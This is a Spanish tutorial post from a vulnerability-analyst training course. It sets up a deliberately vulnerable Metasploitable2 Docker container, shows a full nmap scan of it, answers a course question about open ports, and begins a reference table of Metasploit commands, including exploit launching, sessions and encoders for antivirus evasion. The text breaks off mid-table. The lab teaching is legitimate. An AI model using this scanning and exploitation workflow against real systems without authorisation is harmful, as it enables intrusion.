{"id":23497,"date":"2026-04-20T15:01:06","date_gmt":"2026-04-20T21:01:06","guid":{"rendered":"https:\/\/sada.services\/?p=23497"},"modified":"2026-04-23T16:09:34","modified_gmt":"2026-04-23T22:09:34","slug":"7-training-hub-i-vulnerabilities-analyst-pd-wrl-007-funciones-basicas-de-evaluacion-y-gestion-de-la-vulnerabilidad-metasploiting","status":"publish","type":"post","link":"https:\/\/sada.services\/?p=23497","title":{"rendered":"7. Training Hub I: Vulnerabilities Analyst \u2013 PD-WRL-007 | Funciones B\u00e1sicas de Evaluaci\u00f3n y Gesti\u00f3n de la Vulnerabilidad | Metasploiting"},"content":{"rendered":"\n<p>Para experimentar un poco con Metasploit, lo que haremos ser\u00e1 desplegar una imagen docker vulnerable en nuestra Kali Linux.<\/p>\n\n\n\n<p>Lo primero que habr\u00e1 que hacer es instalar docker. Para ello hay que seguir los siguientes pasos:<\/p>\n\n\n\n<p><strong>1. Actualiza la lista de paquetes:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo su\napt update\napt upgrade<\/code><\/pre>\n\n\n\n<p><strong>2. Instala los paquetes requeridos:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common<\/code><\/pre>\n\n\n\n<p><strong>3. A\u00f1ade la clave PGP de docker:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#obsoleto\ncurl -fsSL https:\/\/download.docker.com\/linux\/debian\/gpg | sudo apt-key add -\n\n# nuevo\nsudo mkdir -p \/etc\/apt\/keyrings\n\ncurl -fsSL https:\/\/download.docker.com\/linux\/debian\/gpg | \\\nsudo gpg --dearmor -o \/etc\/apt\/keyrings\/docker.gpg\n\nsudo chmod a+r \/etc\/apt\/keyrings\/docker.gpg<\/code><\/pre>\n\n\n\n<p><strong>4. A\u00f1ade Docker al repositorio del sistema:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#obsoleto\nsudo add-apt-repository \"deb &#91;arch=amd64] https:\/\/download.docker.com\/linux\/debian $(lsb_release -cs) stable\"\n\n# Nuevo\necho \\\n  \"deb &#91;arch=$(dpkg --print-architecture) signed-by=\/etc\/apt\/keyrings\/docker.gpg] \\\n  https:\/\/download.docker.com\/linux\/debian \\\n  bookworm stable\" | \\\n  sudo tee \/etc\/apt\/sources.list.d\/docker.list &gt; \/dev\/null<\/code><\/pre>\n\n\n\n<p><strong>5. Actualiza la lista de los paquetes de nuevo:<\/strong>&nbsp;<em>sudo apt update<\/em><\/p>\n\n\n\n<p><strong>(Opcional) 6. Elimina las versiones obsoletas de Docker (en caso de tener algunas):<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>apt remove docker docker-engine docker.io<\/code><\/pre>\n\n\n\n<p><strong>7. Instala docker:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt update\nsudo apt install docker-ce docker-ce-cli containerd.io -y<\/code><\/pre>\n\n\n\n<p><strong>8. Verifica la instalaci\u00f3n correcta:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>docker run hello-world<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"921\" height=\"722\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-137.png\" alt=\"\" class=\"wp-image-23500\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-137.png 921w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-137-300x235.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-137-768x602.png 768w\" sizes=\"(max-width: 921px) 100vw, 921px\" \/><\/figure>\n\n\n\n<p><strong>Nota:&nbsp;<\/strong>si estas como root (lo puedes verificar introduciendo \u00ab<em>whoami<\/em>\u00bb por terminal y verificando que te devuelve root) en vuestro sistema Kali (porque hayas introducido \u00ab<em>sudo su<\/em>\u00bb por ejemplo antes de hacer los pasos de instalaci\u00f3n, no es necesario a\u00f1adir el sudo antes de los comandos).<\/p>\n\n\n\n<p>Una vez tenemos instalado docker, pasaremos a descargarnos la imagen vulnerable. Para ello introduciremos por terminal el comando:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>docker pull tleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"891\" height=\"362\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-138.png\" alt=\"\" class=\"wp-image-23501\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-138.png 891w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-138-300x122.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-138-768x312.png 768w\" sizes=\"(max-width: 891px) 100vw, 891px\" \/><\/figure>\n\n\n\n<p>Tal y como vemos en la captura, como ya la ten\u00edamos descargada, notifica que la tenemos en la \u00faltima versi\u00f3n. A ti si es la primera vez que la descargas te saldr\u00e1n m\u00e1s mensajes.<\/p>\n\n\n\n<p>Una vez descargada la imagen, hay que ejecutarla en un contenedor y abrir y mapear los puertos. Para ello hay que ejecutar el comando:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Puerto 22 esta en uso \ndocker run -it -p 22:22 -p 80:80 -p 3306:3306 -p 445:445 -p 8080:8080 tleemcjr\/metasploitable2\n\n# usamos el 2222\ndocker run -it \\\n-p 2222:22 \\\n-p 80:80 \\\n-p 3306:3306 \\\n-p 445:445 \\\n-p 8080:8080 \\\ntleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n<p>Si la imagen empieza a desplegarse, te saldr\u00e1n mensajes parecidos al de la siguiente captura, terminando el proceso con acceso al contenedor creado.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"417\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139-1024x417.png\" alt=\"\" class=\"wp-image-23502\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139-1024x417.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139-300x122.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139-768x313.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139-1536x626.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-139.png 1917w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Una vez tenemos acceso al mismo, introduciremos el comando&nbsp;<em>ip a<\/em>&nbsp;para listar las interfaces del mismo y poder situar a nivel de red a nuestra m\u00e1quina vulnerable.&nbsp;<strong>Una vez sepamos la IP, dejaremos el terminal donde est\u00e1 el docker desplegado abierto y sin tocarlo, ya que si se cierra, estaremos cerrando el contenedor, por lo que para las pruebas habr\u00e1 que abrir un terminal secundario<\/strong>. Por otro lado, en nuestro caso, la m\u00e1quina vulnerable est\u00e1 situada en la IP 172.17.0.2, pero en tu caso puede diferir.<br>NOTA: esto nos logea dentro de la maquina por esto si hacemo ip a corre en el contenedor<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ip a<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"394\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-140.png\" alt=\"\" class=\"wp-image-23503\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-140.png 890w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-140-300x133.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-140-768x340.png 768w\" sizes=\"(max-width: 890px) 100vw, 890px\" \/><\/figure>\n\n\n\n<p>Una forma de verificar que el contenedor est\u00e1 corriendo, es introduciendo el comando: (EN LA NUEVA TERMINAL)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ssh kali@192.168.122.33\nsudo su\ndocker ps -a<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"159\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-1024x159.png\" alt=\"\" class=\"wp-image-23504\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-1024x159.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-300x47.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-768x119.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-1536x238.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-141-2048x318.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Una vez que sabemos que el mismo est\u00e1 desplegado (status Up), lo \u00fanico que nos falta verificar es que nuestra Kali tenga conectividad con la m\u00e1quina a atacar. Para ello podemos usar el comando:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ping 172.17.0.2<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"197\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142-1024x197.png\" alt=\"\" class=\"wp-image-23505\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142-1024x197.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142-300x58.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142-768x148.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142-1536x296.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-142.png 1880w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Que en nuestro caso ser\u00eda&nbsp;<strong><em>ping 172.17.0.2<\/em><\/strong>. Tal y como podemos ver en la imagen, tenemos conectividad y podremos empezar a hacer pruebas.<\/p>\n\n\n\n<p><br><strong>Pregunta<\/strong><\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 puertos comunes tiene abiertos la m\u00e1quina vulnerable?<\/strong><\/p>\n\n\n\n<p><em>Responde en orden ascendente.<\/em><\/p>\n\n\n\n<p><em>Ejemplo de respuesta: 1,4,90,578,900<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Para esto ejecutamos en la segunda terminal<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -p- -sV -sC 172.17.0.2<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>para local<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -p- -sV -sC localhost<\/code><\/pre>\n\n\n\n<p><code>-p-<\/code> \u2192 escanea <strong>todos los puertos (1\u201365535)<\/strong><\/p>\n\n\n\n<p><code>-sV<\/code> \u2192 detecta versiones <\/p>\n\n\n\n<p><code>-sC<\/code> \u2192 scripts b\u00e1sicos<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.99 ( https:\/\/nmap.org ) at 2026-04-20 17:43 -0400\nNmap scan report for 172.17.0.2\nHost is up (0.0000020s latency).\nNot shown: 65510 closed tcp ports (reset)\nPORT      STATE SERVICE     VERSION\n21\/tcp    open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 172.17.0.1\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22\/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n23\/tcp    open  telnet      Linux telnetd\n25\/tcp    open  smtp        Postfix smtpd\n|_ssl-date: 2026-04-20T21:46:04+00:00; 0s from scanner time.\n|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu804-base.localdomain\/organizationName=OCOSA\/stateOrProvinceName=There is no such thing outside US\/countryName=XX\n| Not valid before: 2010-03-17T14:07:45\n|_Not valid after:  2010-04-16T14:07:45\n| sslv2: \n|   SSLv2 supported\n|   ciphers: \n|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5\n|     SSL2_DES_64_CBC_WITH_MD5\n|     SSL2_RC2_128_CBC_WITH_MD5\n|     SSL2_DES_192_EDE3_CBC_WITH_MD5\n|     SSL2_RC4_128_EXPORT40_WITH_MD5\n|_    SSL2_RC4_128_WITH_MD5\n80\/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV\/2)\n|_http-title: Metasploitable2 - Linux\n|_http-server-header: Apache\/2.2.8 (Ubuntu) DAV\/2\n111\/tcp   open  rpcbind     2 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2            111\/tcp   rpcbind\n|   100003  2,3,4       2049\/tcp   nfs\n|   100003  2,3,4       2049\/udp   nfs\n|   100005  1,2,3      50419\/tcp   mountd\n|   100005  1,2,3      58275\/udp   mountd\n|   100021  1,3,4      33414\/tcp   nlockmgr\n|   100021  1,3,4      58022\/udp   nlockmgr\n|   100024  1          42939\/tcp   status\n|_  100024  1          49024\/udp   status\n139\/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445\/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n512\/tcp   open  exec        netkit-rsh rexecd\n513\/tcp   open  login\n514\/tcp   open  tcpwrapped\n1099\/tcp  open  java-rmi    GNU Classpath grmiregistry\n1524\/tcp  open  landesk-rc  LANDesk remote management\n2121\/tcp  open  ftp         ProFTPD 1.3.1\n3306\/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.0.51a-3ubuntu5\n|   Thread ID: 9\n|   Capabilities flags: 43564\n|   Some Capabilities: LongColumnFlag, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, SupportsCompression, SupportsTransactions, SwitchToSSLAfterHandshake\n|   Status: Autocommit\n|_  Salt: RZPbz_L?5+x=fh&#91;k,6k:\n3632\/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\n5432\/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7\n| ssl-cert: Subject: commonName=ubuntu804-base.localdomain\/organizationName=OCOSA\/stateOrProvinceName=There is no such thing outside US\/countryName=XX\n| Not valid before: 2010-03-17T14:07:45\n|_Not valid after:  2010-04-16T14:07:45\n|_ssl-date: 2026-04-20T21:46:04+00:00; 0s from scanner time.\n5900\/tcp  open  vnc         VNC (protocol 3.3)\n| vnc-info: \n|   Protocol version: 3.3\n|   Security types: \n|_    VNC Authentication (2)\n6000\/tcp  open  X11         (access denied)\n6667\/tcp  open  irc         UnrealIRCd\n6697\/tcp  open  irc         UnrealIRCd\n8009\/tcp  open  ajp13       Apache Jserv (Protocol v1.3)\n|_ajp-methods: Failed to get a valid response for the OPTION request\n8180\/tcp  open  http        Apache Tomcat\/Coyote JSP engine 1.1\n|_http-favicon: Apache Tomcat\n|_http-server-header: Apache-Coyote\/1.1\n|_http-title: Apache Tomcat\/5.5\n8787\/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path \/usr\/lib\/ruby\/1.8\/drb)\n41515\/tcp open  java-rmi    GNU Classpath grmiregistry\nMAC Address: BE:5D:5B:77:E5:6C (Unknown)\nService Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s\n|_smb2-time: Protocol negotiation failed (SMB2)\n|_nbstat: NetBIOS name: B4E218382CFA, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: b4e218382cfa\n|   NetBIOS computer name: \n|   Domain name: \n|   FQDN: b4e218382cfa\n|_  System time: 2026-04-20T17:45:56-04:00\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 136.43 seconds<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>TOSO los Puertos abiertos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>21,22,23,25,80,111,139,445,512,513,514,1099,1524,2121,3306,3632,5432,5900,6000,6667,6697,8009,8180,8787,41515<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Pero como la pregunta dice puertos comunes serian estos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>22,80,3306,445,8080<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>que son los que mapeamos en docker<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"604\" height=\"245\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-144.png\" alt=\"\" class=\"wp-image-23507\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-144.png 604w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-144-300x122.png 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"387\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-145-1024x387.png\" alt=\"\" class=\"wp-image-23508\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-145-1024x387.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-145-300x113.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-145-768x290.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-145.png 1138w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Lo b\u00e1sico de Metasploit<\/h3>\n\n\n\n<p>Ser\u00eda imposible hablar de hacking sin mencionar&nbsp;<strong>Metasploit<\/strong>. B\u00e1sicamente Metasploit es un framework de c\u00f3digo abierto desarrollado en Perl y Ruby enfocado al equipos de Read Team.<\/p>\n\n\n\n<p>Es una herramienta muy completa que cuenta con:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Much\u00edsimos\u00a0<strong>exploits<\/strong>, que son <strong>vulnerabilidades<\/strong> conocidas, en las cuales tienen tambi\u00e9n<\/li>\n\n\n\n<li>M\u00f3dulos, llamados\u00a0<strong>payloads<\/strong>, que son los <strong>c\u00f3digos que explotan estas vulnerabilidades.<\/strong><\/li>\n\n\n\n<li><strong>Encoders<\/strong>, que son una especie de c\u00f3digos de cifrado para <strong>evasi\u00f3n de antivirus o sistemas de seguridad perimetral.<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Otra de las ventajas de este framework es que nos permite interactuar tambi\u00e9n con herramientas externas, como&nbsp;<em><strong>Nmap<\/strong><\/em>&nbsp;o&nbsp;<em><strong>Nessus<\/strong><\/em>.<\/p>\n\n\n\n<p>En este laboratorio, vamos a utilizar Metasploit.<\/p>\n\n\n\n<p>Para lanzarlo, abre una terminal de Linux y escribe&nbsp;<em>msfconsole<\/em><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfconsole<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"964\" height=\"667\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-155.png\" alt=\"\" class=\"wp-image-23534\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-155.png 964w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-155-300x208.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-155-768x531.png 768w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Para poder actualizarlo podemos lanzar el siguiente comando:\u00a0<strong><em>msfupdate<\/em><\/strong><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code><strong><em>msfupdate<\/em><\/strong><\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>NOTA: da este error ahora se instala con el sistema<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>msfupdate is no longer supported when Metasploit is part of the operating\nsystem. Please use 'apt update; apt install metasploit-framework'\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"985\" height=\"586\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-156.png\" alt=\"\" class=\"wp-image-23535\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-156.png 985w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-156-300x178.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-156-768x457.png 768w\" sizes=\"(max-width: 985px) 100vw, 985px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Entonces para actualizar<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt update\nsudo apt install metasploit-framework -y\nsudo apt autoremove\nsudo apt upgrade -y<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>volvemos a ingresar<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>msfconsole<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Y si quieres saber la versi\u00f3n que tienes, puedes ejecutar este comando:\u00a0<em>version<\/em>.<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code><em>version<\/em><\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Si utilizas \u00ab<strong><em>?<\/em><\/strong>\u00bb o \u00ab<em><strong>help<\/strong><\/em>\u00ab, obtendr\u00e1s un listado de los comandos m\u00e1s frecuentes. Aqu\u00ed te lo dejamos m\u00e1s claros para que sepas como utilizarlos:<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td class=\"has-text-align-left\" data-align=\"left\">show exploits\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMostrar todos los exploits del Framework.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshow payloads<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMostrar todos los payloads del Framework.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshow auxiliary<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMostrar todos los m\u00f3dulos auxiliares del Framework.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsearch [cadena]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bB\u00fasqueda por cadena<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsearch type:[exploit, payload, auxiliary, encoder, post] [cadena]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bB\u00fasqueda por tipo y cadena<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200binfo\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra informaci\u00f3n acerca de un exploit cargado.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200buse [cadena]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCarga el exploit indicado.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bLHOST\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bVariable local host<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bRHOST\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bVariable host remoto<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bset [par\u00e1metro] [valor]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bGraba en el par\u00e1metro el valor indicado.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsetg[par\u00e1metro] [valor]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bGraba en valor para el par\u00e1metro indicado de forma global.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshow options<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra las opciones de un exploit.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshow targets<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra las plataformas objetivo del exploit.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bset target [n\u00famero]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEspecifica un objetivo concreto de los posibles.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bset payload [payload]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEspecifica un payload a usar..<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshow advanced<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra las opciones avanzadas.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bset autorunscript migrate -f<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMigra el proceso a un hilo independiente de forma autom\u00e1tica.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bcheck\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bComprueba si un objetivo es vulnerable a un exploit.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexploit\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta un exploit<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexploit -j<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta un exploit en background.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexploit -z<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bNo interact\u00faa con la sesi\u00f3n despu\u00e9s de acceder con \u00e9xito<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexploit -e encoder<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEspecifica el encoder a usar con el payload<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexploit -h<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la ayuda para el exploit especificado<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -l<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la lista de sesiones disponibles<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -l -v<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la lista de sesiones disponibles en modo verbose<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -s [script]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta un script espec\u00edfico en todas las sesiones de meterpreter activas.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -K<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMata todas las sesiones activas<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -c cmd<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta un comando en todas las sesiones activas<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsessions -u sessionID<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bActualiza una shell de Win32 a una consola de meterpreter<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_create [nombre]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCrea una base de datos<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_connect [nombre]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCrea y se conecta a una base de datos<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_nmap<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bUsa y carga los resultados de Nmap en una base de datos<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_autopwn -h<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la ayuda para usar db_autopwn.<\/td><\/tr><tr><td 